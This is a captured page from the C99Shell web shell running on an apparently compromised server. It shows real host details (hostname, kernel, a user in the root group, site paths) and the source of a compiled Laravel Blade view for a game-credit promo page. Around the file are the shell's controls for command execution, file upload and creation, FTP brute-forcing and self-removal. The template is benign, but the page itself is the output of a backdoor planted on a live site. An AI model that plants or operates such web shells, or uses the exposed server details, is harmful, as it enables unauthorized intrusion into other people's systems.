!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/game.picotech.app/public_html/core/storage/framework/views/   drwxr-xr-x
Free 29.28 GB of 117.98 GB (24.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     d3c0515489165506d992b3515c6bbb95.php (6.79 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |


<?php $__env->startSection('title'); ?>
<?php 
echo e(__('Event')); ?>

<?php $__env->stopSection(); ?>

<?php $__env->startSection('styleplugins'); ?>

<?php $__env->stopSection(); ?>

<?php $__env->startSection('content'); ?>

<div class="container mt-5 mb-5">
    <?php
    $setting 
DB::table('settings')->first();
    
$socialLink json_decode($setting->social_linktrue);

    if (
is_array($socialLink) && isset($socialLink['links']) && isset($socialLink['icons'])) {
        
$links $socialLink['links'];
        
$icons $socialLink['icons'];
    } else {
            
$links = [];
            
$icons = [];
    }
    
?>
    <div class="details-page section-top-banner-carousel">
        <div class="d-block">
            <div class="template-sticky-img">
                <div class="template-sticky-img-content">
                    <div class="container">
                        <div class="row">
                            <div class="col-12 -0">
                                <div class="detail-image-container">
                                    <img src="<?php echo e(isset($post->photo) ?  asset('assets/images/'.$post->photo) : asset('assets/images/placeholder.png')); ?>"
                                        alt="">
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="container">
                        <div class="row">
                            <div class="col-12">
                                
                                <div class="social-links mt-4">
                                    <div class="social-media-share-container">
                                        <?php if(!empty($links) && !empty($icons)): ?>
                                        <?php $__currentLoopData $links$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $index => $link): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                                            <a href="<?php echo e($link); ?>" target="_blank" class="share-item rounded-circle">
                                                <i class="<?php echo e($icons[$index]); ?>"></i>
                                            </a>
                                        <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                                    <?php endif; ?>
                                    </div>
                                </div>
                                <div class="article-title-container">
                                    <div class="article-sub"><?php echo e(\Carbon\Carbon::parse($post->updated_at)->format('Y-m-d')); ?> <span class="dot">.</span> NEWS</div>
                                    <div class="article-title">
                                        <h1> <?php echo e($post->title); ?> </h1>
                                    </div>
                                </div>
                                <div class="article-box-content">
                                    <?php echo $post->details?>

                                </div>
                                <div class="social-links mt-4">
                                    <div class="social-media-share-container">
                                        <?php if(!empty($links) && !empty($icons)): ?>
                                        <?php $__currentLoopData $links$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $index => $link): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                                            <a href="<?php echo e($link); ?>" target="_blank" class="share-item rounded-circle">
                                                <i class="<?php echo e($icons[$index]); ?>"></i>
                                            </a>
                                        <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                                    <?php endif; ?>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>




<div class="modal fade" id="exampleModal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true">
    <div class="modal-dialog modal-dialog-centered">
        <div class="modal-content modal-content-bg-color">
            <div class="social-media-share-container-more-top">
                <div class="social-media-share-container-more-top-title">
                    <h3 class="mx-auto">Share this promo</h3>
                    <h3 class="title3">Buy Valorant Points only on UniPin.com using bKash</h3>
                </div>
                <div class="social-media-share-container-more-close">
                    <a href="#" id="ellipsis-hide"><i class="fa fa-times"></i></a>
                </div>
            </div>
            <div class="social-media-share-container-more-main">
                <a href="#">
                    <img src="./images/referral-facebook.svg" alt="">
                    <span>Facebook</span>
                </a>
                <a href="#">
                    <img src="./images/referral-twitter.svg" alt="">
                    <span>Twitter</span>
                </a>
                <a href="#">
                    <img src="./images/referral-whatsapp.svg" alt="">
                    <span>Whatsapp</span>
                </a>
                <a href="#">
                    <img src="./images/cs-email.svg" alt="">
                    <span>Email</span>
                </a>
            </div>
            <div class="social-media-share-container-more-footer input-group">
                <input type="text" class="form-control"
                    value="https://www.unipin.com/bgd/article/buy-riot-codes-to-top-up-valorant-points-on-uni-pin"
                    readonly>
                <span class="input-group-text">Copy</span>
            </div>
        </div>
    </div>
</div>
<?php $__env->stopSection(); ?>

<?php $__env->startSection('jsplugins'); ?>
<script>
    $(document).on('click','.ellipsis' , function(e){
            e.preventDefault();
            $('#exampleModal').modal('show');
        });
        $(document).on('click','#ellipsis-hide' , function(e){
            e.preventDefault();
            $('#exampleModal').modal('hide');
        });
</script>
<?php $__env->stopSection(); ?>
<?php 
echo $__env->make('master.front'\Illuminate\Support\Arr::except(get_defined_vars(), ['__data''__path']))->render(); ?><?php /**PATH D:\PicTech\unipin\unipin\core\resources\views/front/details.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--